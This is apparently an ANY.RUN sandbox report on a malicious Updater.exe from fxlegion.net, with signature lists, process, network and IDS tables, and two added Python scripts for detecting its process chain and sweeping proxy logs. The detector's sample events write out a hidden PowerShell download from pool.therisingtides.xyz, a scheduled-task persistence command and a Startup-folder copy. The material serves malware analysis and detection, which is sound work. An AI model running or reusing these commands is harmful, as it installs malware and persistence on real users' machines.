URL: http://fxlegion.net/Updater.exe
Full analysis: https://app.any.run/tasks/43e37e5f-f13c-41f2-89c4-019ee8645cc6
Verdict: Malicious activity
Analysis date: June 19, 2019, 09:21:41
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MD5: 007B46443B171A65A434654DB1470311
SHA1: 51095D89639456112C1C74786A4E0B8B272B39D8
SHA256: 425D44463CDA1AB264839D6417403F82D82DBBC20CD6F12D7A8C9BB86E969BA8
SSDEEP: 3:N1KYIKgKEE6:CY3Pk

ANY.RUN is an interactive service that gives the analyst full access to the guest system. Information in this report may therefore be distorted by user actions during the session and is provided as-is for the reader's awareness. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS
    • Application was dropped or rewritten from another process
      • Updater.exe (PID: 540)
    • Loads the Task Scheduler COM API
      • schtasks.exe (PIDs: 3140, 2964, 3864, 3124)
    • Uses Task Scheduler to run other applications
      • CMD.exe (PID: 1244)
    • Writes to a start menu file
      • xcopy.exe (PID: 1876)
    • Runs PING.EXE for delay simulation
      • cmd.exe (PIDs: 3880, 3048, 3052)
    • Executes PowerShell scripts
      • cmd.exe (PIDs: 1892, 2120, 2956, 3220, 312, 1084, 2288, 1464, 952, 2068, 2356, 1472, 2332, 2368, 2596, 3400, 2000, 1668, 3776, 3552, 2972, 3588, 2516, 3452, 2184, 2836, 3364, 1092)
  • SUSPICIOUS
    • Executable content was dropped or overwritten
      • chrome.exe (PID: 3392)
      • xcopy.exe (PID: 1332)
    • Creates files in the user directory
      • xcopy.exe (PIDs: 1332, 3784, 1876)
      • powershell.exe (PIDs: 1812, 2372, 1576, 3536, 2504, 2540, 2532, 3476, 3252, 3888, 2848, 3864, 1532, 3012, 3004, 2064, 2556, 3168, 3420, 2264, 4080, 2320, 2212, 1740, 640, 3996, 3652, 3828, 3604, 3884, 1512, 3492, 2752, 2912, 756, 2608, 3396, 916, 3836, 3124, 3488, 936, 2308, 3380, 3676, 1652, 3344, 2324, 3784, 3696, 3280, 3548, 852, 1832, 1968)
    • Starts CMD.EXE for commands execution
      • Updater.exe (PID: 540)
      • WScript.exe (PIDs: 3640, 1388, 2112, 2684, 3540, 2136, 3496, 2072, 2176, 2624, 1076, 2668, 300, 2132, 2404, 608, 3312, 3672, 1644, 964, 3616, 3136, 324, 2776, 3260, 900, 2616, 1156, 540, 904, 3716)
      • cmd.exe (PID: 3048)
    • Uses ATTRIB.EXE to modify file attributes
      • cmd.exe (PID: 2364)
    • Uses TASKKILL.EXE to kill process
      • cmd.exe (PID: 2316)
    • Executes scripts
      • CMD.exe (PID: 1244)
      • cmd.exe (PID: 3880)
      • powershell.exe (PIDs: 2372, 1576, 3252, 2504, 3004, 3888, 1532, 2556, 2064, 4080, 3420, 3996, 1740, 3884, 1512, 3828, 2608, 3124, 756, 916, 936, 3488, 3676, 3380, 3784, 1832, 852)
    • Uses TASKLIST.EXE to query information about running processes
      • cmd.exe (PID: 3880)
    • Starts Internet Explorer
      • cmd.exe (PID: 3048)
    • Application launched itself
      • cmd.exe (PID: 3048)
  • INFO
    • Reads Internet Cache Settings
      • chrome.exe (PID: 3392)
      • iexplore.exe (PID: 3008)
    • Manual execution by user
      • Updater.exe (PID: 540)
    • Application launched itself
      • chrome.exe (PID: 3392)
    • Creates files in the user directory
      • iexplore.exe (PID: 3008)
    • Changes internet zones settings
      • iexplore.exe (PID: 2344)
    • Reads internet explorer settings
      • iexplore.exe (PID: 3008)
Signature artifacts and their mapping to the MITRE ATT&CK matrix are in the full report.
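The signature list above names a living-off-the-land chain (schtasks persistence, xcopy into the Start Menu folder, ping against loopback as a sleep, and a repeated WScript.exe -> cmd.exe -> powershell.exe loop that requests MicrosoftUpdate86.exe), but the report does not show the command lines behind it. The script below is an added example, not ANY.RUN code and not the sample's own batch or VBS files: it walks process-creation records shaped like Sysmon Event ID 1 fields and flags each of those behaviours. Every record in SAMPLE_EVENTS, the rule names and the ping-count threshold are constructed assumptions. One caveat the report itself illustrates: PIDs are reused within a run (540 is listed for Updater.exe and later for a WScript.exe; 3864 for schtasks.exe and powershell.exe), so on real telemetry key the parent walk on ProcessGuid/ParentProcessGuid rather than on PID; the constructed sample keeps PIDs unique only for readability.

```python
"""Detection sketch for the process-chain behaviour listed in this report.

Added example, not ANY.RUN code and not the sample's own scripts.
Records mimic Sysmon Event ID 1 (ProcessCreate) fields; every command line
below is constructed to mirror a signature name from the report.
"""
import re

# Constructed events (not taken from the report).  PIDs are kept unique here;
# on real Sysmon data walk ParentProcessGuid instead, because PIDs get reused
# within a run (this report shows PID 540 as Updater.exe and later WScript.exe).
SAMPLE_EVENTS = [
    {"pid": 540, "ppid": 1000, "image": r"C:\Users\admin\Downloads\Updater.exe",
     "cmdline": r'"C:\Users\admin\Downloads\Updater.exe"'},
    {"pid": 1244, "ppid": 540, "image": r"C:\Windows\system32\CMD.exe",
     "cmdline": 'CMD /C "copy.bat"'},
    {"pid": 1876, "ppid": 1244, "image": r"C:\Windows\system32\xcopy.exe",
     "cmdline": r'xcopy /Y run.vbs "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"'},
    {"pid": 3140, "ppid": 1244, "image": r"C:\Windows\system32\schtasks.exe",
     "cmdline": r'schtasks /create /sc minute /mo 5 /tn Updater /tr "wscript.exe C:\Users\admin\AppData\Roaming\run.vbs" /f'},
    {"pid": 3880, "ppid": 1244, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": "cmd /c ping 127.0.0.1 -n 10 > nul"},
    {"pid": 3881, "ppid": 3880, "image": r"C:\Windows\system32\PING.EXE",
     "cmdline": "ping 127.0.0.1 -n 10"},
    {"pid": 3640, "ppid": 1000, "image": r"C:\Windows\system32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\admin\AppData\Roaming\run.vbs"},
    {"pid": 1892, "ppid": 3640, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'cmd /c "C:\Users\admin\AppData\Roaming\dl.bat"'},
    {"pid": 1812, "ppid": 1892, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
                "'http://pool.therisingtides.xyz/MicrosoftUpdate86.exe',$env:TEMP+'\\dl.exe')\""},
    # Benign control: a single echo request is ordinary connectivity checking.
    {"pid": 2000, "ppid": 1000, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": "cmd /c ping 127.0.0.1 -n 1"},
    {"pid": 2001, "ppid": 2000, "image": r"C:\Windows\system32\PING.EXE",
     "cmdline": "ping 127.0.0.1 -n 1"},
]

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)
LOOPBACK_RE = re.compile(r"\b(?:127\.0\.0\.1|localhost)\b", re.I)
PING_COUNT_RE = re.compile(r"-n\s+(\d+)", re.I)
STARTUP_DIR_RE = re.compile(r"\\start menu\\programs\\startup\\", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(by_pid, pid, limit=8):
    """Image basenames from `pid` upward, e.g. ['powershell.exe', 'cmd.exe', 'wscript.exe']."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < limit:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events):
    """Return (pid, rule, evidence) tuples for the behaviours this report flags."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        img, cmd = basename(e["image"]), e["cmdline"]
        chain = ancestry(by_pid, e["pid"])
        if img == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
            findings.append((e["pid"], "schtasks_create", cmd))
        if img == "xcopy.exe" and STARTUP_DIR_RE.search(cmd):
            findings.append((e["pid"], "startup_folder_write", cmd))
        if img == "ping.exe" and LOOPBACK_RE.search(cmd):
            m = PING_COUNT_RE.search(cmd)
            # "-n 1" is the normal liveness probe; a larger count against
            # loopback exists only to burn time (the report's "delay simulation").
            if m and int(m.group(1)) >= 2:
                findings.append((e["pid"], "ping_delay", cmd))
        url = URL_RE.search(cmd)
        if img == "powershell.exe" and url and chain[1:3] == ["cmd.exe", "wscript.exe"]:
            findings.append((e["pid"], "wscript_cmd_powershell_download", url.group(0)))
    return findings


if __name__ == "__main__":
    for pid, rule, evidence in detect(SAMPLE_EVENTS):
        print(f"{pid:>5}  {rule:<32} {evidence}")
```

The PowerShell rule deliberately requires the two-level ancestry rather than matching any powershell.exe with a URL, which is what separates this loop from an administrator's one-off download; the ping rule keeps `-n 1` out of the results so an ordinary reachability check does not page anyone.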
Malware configuration: no data.
Total processes: 234
Monitored processes: 162
Malicious processes: 88
Suspicious processes: 0

Behavior graph (interactive in the full report). Process start order as listed in the graph: chrome.exe with its crashpad, watcher, GPU and renderer children; then updater.exe, cmd.exe, three xcopy.exe, four schtasks.exe and timeout.exe; then repeated cycles of wscript.exe -> cmd.exe -> powershell.exe, interleaved with ping.exe, attrib.exe, taskkill.exe, tasklist.exe, findstr.exe, wmic.exe and two iexplore.exe processes.

Process information (10 of the 162 monitored processes are listed on this page; the rest are in the full report)

PID 3392  chrome.exe  parent: explorer.exe
  CMD:  "C:\Program Files\Google\Chrome\Application\chrome.exe" http://fxlegion.net/Updater.exe
  Path: C:\Program Files\Google\Chrome\Application\chrome.exe
  User: admin | Company: Google Inc. | Integrity level: MEDIUM | Description: Google Chrome | Exit code: 3221225547 (0xC000004B) | Version: 73.0.3683.75

PID 3800  chrome.exe  parent: chrome.exe
  CMD:  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=73.0.3683.75 --initial-client-data=0x7c,0x80,0x84,0x78,0x88,0x6cd70f18,0x6cd70f28,0x6cd70f34
  Path: C:\Program Files\Google\Chrome\Application\chrome.exe
  User: admin | Company: Google Inc. | Integrity level: MEDIUM | Description: Google Chrome | Exit code: 0 | Version: 73.0.3683.75

PID 2864  chrome.exe  parent: chrome.exe
  CMD:  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=3388 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
  Path: C:\Program Files\Google\Chrome\Application\chrome.exe
  User: admin | Company: Google Inc. | Integrity level: MEDIUM | Description: Google Chrome | Exit code: 0 | Version: 73.0.3683.75

PID 2352  chrome.exe  parent: chrome.exe
  CMD:  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=944,17188909726604746557,11164848659531028005,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwAAAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=13757712096839986545 --mojo-platform-channel-handle=968 --ignored=" --type=renderer " /prefetch:2
  Path: C:\Program Files\Google\Chrome\Application\chrome.exe
  User: admin | Company: Google Inc. | Integrity level: LOW | Description: Google Chrome | Exit code: 0 | Version: 73.0.3683.75

PID 3108  chrome.exe  parent: chrome.exe
  CMD:  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=944,17188909726604746557,11164848659531028005,131072 --enable-features=PasswordImport --service-pipe-token=1267025299571584538 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=1267025299571584538 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1968 /prefetch:1
  Path: C:\Program Files\Google\Chrome\Application\chrome.exe
  User: admin | Company: Google Inc. | Integrity level: LOW | Description: Google Chrome | Exit code: 0 | Version: 73.0.3683.75

PID 2808  chrome.exe  parent: chrome.exe
  CMD:  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=944,17188909726604746557,11164848659531028005,131072 --enable-features=PasswordImport --service-pipe-token=14499659466139193942 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=14499659466139193942 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1992 /prefetch:1
  Path: C:\Program Files\Google\Chrome\Application\chrome.exe
  User: admin | Company: Google Inc. | Integrity level: LOW | Description: Google Chrome | Exit code: 0 | Version: 73.0.3683.75

PID 1696  chrome.exe  parent: chrome.exe
  CMD:  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=944,17188909726604746557,11164848659531028005,131072 --enable-features=PasswordImport --service-pipe-token=11342234035670150271 --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=11342234035670150271 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2240 /prefetch:1
  Path: C:\Program Files\Google\Chrome\Application\chrome.exe
  User: admin | Company: Google Inc. | Integrity level: LOW | Description: Google Chrome | Exit code: 0 | Version: 73.0.3683.75

PID 4084  chrome.exe  parent: chrome.exe
  CMD:  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=944,17188909726604746557,11164848659531028005,131072 --enable-features=PasswordImport --disable-gpu-sandbox --use-gl=disabled --gpu-preferences=KAAAAAAAAACAAwAAAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=6386663286184820684 --mojo-platform-channel-handle=3672 /prefetch:2
  Path: C:\Program Files\Google\Chrome\Application\chrome.exe
  User: admin | Company: Google Inc. | Integrity level: MEDIUM | Description: Google Chrome | Exit code: 0 | Version: 73.0.3683.75

PID 540  Updater.exe  parent: explorer.exe
  CMD:  "C:\Users\admin\Downloads\Updater.exe"
  Path: C:\Users\admin\Downloads\Updater.exe
  User: admin | Integrity level: MEDIUM | Exit code: 0 (no company, description or version metadata recorded)

PID 1244  CMD.exe  parent: Updater.exe
  CMD:  CMD /C "copy.bat"
  Path: C:\Windows\system32\CMD.exe
  User: admin | Company: Microsoft Corporation | Integrity level: MEDIUM | Description: Windows Command Processor | Exit code: 0 | Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events: 31 496
Read events: 28 113
Write events: 0
Delete events: 0
Modification events: no data

Executable files: 4
Suspicious files: 125
Text files: 139
Unknown types: 6

Dropped files (10 entries shown on this page; the MD5, SHA256 and Type columns are empty for every row here)

PID   Process     Filename
3392  chrome.exe  C:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
3392  chrome.exe  C:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
3392  chrome.exe  C:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
3392  chrome.exe  C:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2
3392  chrome.exe  C:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3
3392  chrome.exe  C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\dd45362e-e371-4632-8fdc-7d48a9877f42.tmp
3392  chrome.exe  C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000018.dbtmp
3392  chrome.exe  C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\index
3392  chrome.exe  C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_0
3392  chrome.exe  C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
HTTP(S) requests: 30
TCP/UDP connections: 101
DNS requests: 16
Threats: 0

HTTP requests (10 of 30 shown on this page)

PID   | Process        | Method | HTTP code | IP                 | URL                                                  | CN | Type  | Size  | Reputation
3392  | chrome.exe     | GET    | 301       | 66.42.48.122:80    | http://fxlegion.net/Updater.exe                      | US | html  | 162 b | suspicious
2344  | iexplore.exe   | GET    | 200       | 204.79.197.200:80  | http://www.bing.com/favicon.ico                      | US | image | 237 b | whitelisted
2264  | powershell.exe | GET    | 301       | 66.42.48.122:80    | http://pool.therisingtides.xyz/MicrosoftUpdate86.exe | US | html  | 162 b | suspicious
3536  | powershell.exe | GET    | 301       | 66.42.48.122:80    | http://pool.therisingtides.xyz/MicrosoftUpdate86.exe | US | html  | 162 b | suspicious
3864  | powershell.exe | GET    | 301       | 66.42.48.122:80    | http://pool.therisingtides.xyz/MicrosoftUpdate86.exe | US | html  | 162 b | suspicious
2848  | powershell.exe | GET    | 301       | 66.42.48.122:80    | http://pool.therisingtides.xyz/MicrosoftUpdate86.exe | US | html  | 162 b | suspicious
1812  | powershell.exe | GET    | 301       | 66.42.48.122:80    | http://pool.therisingtides.xyz/MicrosoftUpdate86.exe | US | html  | 162 b | suspicious
3396  | powershell.exe | GET    | 301       | 66.42.48.122:80    | http://pool.therisingtides.xyz/MicrosoftUpdate86.exe | US | html  | 162 b | suspicious
2540  | powershell.exe | GET    | 301       | 66.42.48.122:80    | http://pool.therisingtides.xyz/MicrosoftUpdate86.exe | US | html  | 162 b | suspicious
3012  | powershell.exe | GET    | 301       | 66.42.48.122:80    | http://pool.therisingtides.xyz/MicrosoftUpdate86.exe | US | html  | 162 b | suspicious

Connections (10 of 101 shown on this page; "-" marks a field that is blank in the report)

PID   | Process        | IP                  | Domain                        | ASN         | CN | Reputation
3392  | chrome.exe     | 172.217.18.100:443  | www.google.com                | Google Inc. | US | whitelisted
3392  | chrome.exe     | 172.217.22.110:443  | sb-ssl.google.com             | Google Inc. | US | whitelisted
3392  | chrome.exe     | 172.217.18.163:443  | ssl.gstatic.com               | Google Inc. | US | whitelisted
3392  | chrome.exe     | 172.217.22.35:443   | clientservices.googleapis.com | Google Inc. | US | whitelisted
3392  | chrome.exe     | 66.42.48.122:443    | fxlegion.net                  | -           | US | suspicious
3392  | chrome.exe     | 66.42.48.122:80     | fxlegion.net                  | -           | US | suspicious
1812  | powershell.exe | 66.42.48.122:80     | fxlegion.net                  | -           | US | suspicious
-     | -              | 172.217.18.163:443  | ssl.gstatic.com               | Google Inc. | US | whitelisted
3392  | chrome.exe     | 172.217.16.141:443  | accounts.google.com           | Google Inc. | US | suspicious
2532  | powershell.exe | 66.42.48.122:80     | fxlegion.net                  | -           | US | suspicious

DNS requests (10 of 16 shown on this page)

Domain                        | IP(s)                         | Reputation
clientservices.googleapis.com | 172.217.22.35                 | whitelisted
fxlegion.net                  | 66.42.48.122                  | suspicious
accounts.google.com           | 172.217.16.141                | shared
www.google.com                | 172.217.18.100                | whitelisted
sb-ssl.google.com             | 172.217.22.110                | whitelisted
ssl.gstatic.com               | 172.217.18.163                | whitelisted
pool.therisingtides.xyz       | 66.42.48.122                  | suspicious
www.gstatic.com               | 172.217.16.163                | whitelisted
clients1.google.com           | 172.217.16.174                | whitelisted
www.bing.com                  | 204.79.197.200, 13.107.21.200 | whitelisted

Threats (IDS alerts)

PID   | Process        | Class                         | Message
1812  | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
1812  | powershell.exe | Potentially Bad Traffic       | AV INFO HTTP Request to a *.xyz domain
3536  | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
3536  | powershell.exe | Potentially Bad Traffic       | AV INFO HTTP Request to a *.xyz domain
3476  | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
3476  | powershell.exe | Potentially Bad Traffic       | AV INFO HTTP Request to a *.xyz domain
2532  | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
2532  | powershell.exe | Potentially Bad Traffic       | AV INFO HTTP Request to a *.xyz domain
2540  | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
2540  | powershell.exe | Potentially Bad Traffic       | AV INFO HTTP Request to a *.xyz domain
No debug info
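The script below is an added example, not ANY.RUN code, that turns the network indicators from the HTTP, Connections, DNS and Threats tables above into a sweep over a proxy log. Two caveats visible in those tables drive its design. First, fxlegion.net and pool.therisingtides.xyz both resolved to 66.42.48.122 during the run, so a hit on the IP alone cannot say which hostname was requested (the Connections table labels the PowerShell sessions fxlegion.net while the HTTP table shows the same PIDs requesting MicrosoftUpdate86.exe from pool.therisingtides.xyz). Second, every request for either IOC URL answered with HTTP 301 and a 162-byte HTML body, so the run records the download attempt, not the payload; the sweep therefore reports separately whether a body was served. The log line format, the sample lines and the TLD set behind the no-Referer EXE rule (the ET alert name says "Firesale gTLD" but the rule's actual list is not on the page) are assumptions.

```python
"""Network IOC sweep for the indicators on this page.

Added example, not ANY.RUN code.  Indicator values are copied from the
report's HTTP, Connections and DNS tables; the log format, the sample
lines and CHEAP_GTLDS are assumptions.
"""
from urllib.parse import urlsplit

# From the report.  Both hostnames resolved to the same IP during the run.
IOC_DOMAINS = {"fxlegion.net", "pool.therisingtides.xyz"}
IOC_IPS = {"66.42.48.122"}
IOC_URLS = {
    "http://fxlegion.net/Updater.exe",
    "http://pool.therisingtides.xyz/MicrosoftUpdate86.exe",
}
# The ET alert name mentions "Firesale gTLD"; the rule's real TLD list is not
# on the page, so this set is an assumption for the heuristic below.
CHEAP_GTLDS = {"xyz", "top", "club", "site"}

# Constructed proxy log (not from the report): ts client method url status bytes referer
SAMPLE_LOG = """\
2019-06-19T09:22:01Z 10.0.0.5 GET http://fxlegion.net/Updater.exe 301 162 -
2019-06-19T09:22:02Z 10.0.0.5 GET https://fxlegion.net/Updater.exe 200 410112 -
2019-06-19T09:24:40Z 10.0.0.5 GET http://pool.therisingtides.xyz/MicrosoftUpdate86.exe 301 162 -
2019-06-19T09:24:41Z 10.0.0.5 GET http://66.42.48.122/MicrosoftUpdate86.exe 200 93184 -
2019-06-19T09:25:00Z 10.0.0.7 GET http://www.bing.com/favicon.ico 200 237 -
2019-06-19T09:25:10Z 10.0.0.7 GET http://example.xyz/setup.exe 200 5000 http://example.xyz/
"""


def parse_line(line):
    ts, client, method, url, status, size, referer = line.split()
    return {"ts": ts, "client": client, "method": method, "url": url,
            "status": int(status), "bytes": int(size), "referer": referer}


def tag_record(rec):
    """Indicator tags for one request; an empty list means nothing matched."""
    tags = []
    parts = urlsplit(rec["url"])
    host = (parts.hostname or "").lower()
    if rec["url"] in IOC_URLS:
        tags.append("ioc_url")
    if host in IOC_DOMAINS:
        tags.append("ioc_domain")
    if host in IOC_IPS:
        # Lower confidence on its own: both report domains sit on this IP, so
        # an IP-only hit cannot say which hostname or payload was asked for.
        tags.append("ioc_ip")
    tld = host.rsplit(".", 1)[-1]
    # Same shape as the ET alert on the page: an EXE fetched from a cheap gTLD
    # with no Referer header (a browser click would normally carry one).
    if (rec["method"] == "GET" and parts.path.lower().endswith(".exe")
            and tld in CHEAP_GTLDS and rec["referer"] == "-"):
        tags.append("exe_no_referer_cheap_gtld")
    return tags


def sweep(log_text):
    """One hit per matching line, noting whether a response body was actually served."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        rec = parse_line(line)
        tags = tag_record(rec)
        if tags:
            # The report's own requests for both IOC URLs got a 301 with a
            # 162-byte HTML body: evidence of the attempt, not of the payload.
            hits.append({"line": n, "url": rec["url"], "status": rec["status"],
                         "payload_seen": rec["status"] == 200 and rec["bytes"] > 0,
                         "tags": tags})
    return hits


if __name__ == "__main__":
    for h in sweep(SAMPLE_LOG):
        print(h)
```

Treat `ioc_ip` hits as a pivot rather than a verdict, and treat any hit with `payload_seen` false the way the sandbox run should be read: the host asked for the file, which is enough to isolate and investigate, but not proof that MicrosoftUpdate86.exe ever landed on disk.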